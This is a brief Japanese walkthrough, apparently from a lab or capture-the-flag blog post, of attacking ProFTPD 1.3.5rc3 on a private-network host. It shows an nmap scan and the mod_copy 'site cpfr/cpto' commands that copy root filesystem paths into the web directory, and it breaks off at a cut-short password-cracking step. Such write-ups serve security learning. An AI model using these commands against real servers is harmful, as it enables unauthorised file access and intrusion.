ProFTPD 1.3.5rc3における権限昇格の脆弱性分析
情報収集
対象システムの基本情報:
IPアドレス
開放ポート
192.168.101.148
21(FTP), 80(HTTP), 2121(代替FTP)
$ nmap -p- 192.168.101.148 --min-rate 1000 -sC -sV
ProFTPDの脆弱性悪用
ProFTPD 1.3.5rc3には以下のコマンドが有効:
ftp> site cpfr /proc/self/root
ftp> site cpto /var/www/html/root
パスワードクラッキング
$ cewl - ...
5月13日 00:09 投稿